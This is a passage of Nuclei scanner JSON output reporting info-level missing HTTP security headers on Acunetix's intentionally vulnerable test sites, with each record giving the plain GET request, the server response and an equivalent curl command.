click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.211583911Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.211591508Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.211591965Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.211594562Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.494948177Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.643208222Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.643238493Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.643239051Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:14.64327512Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst 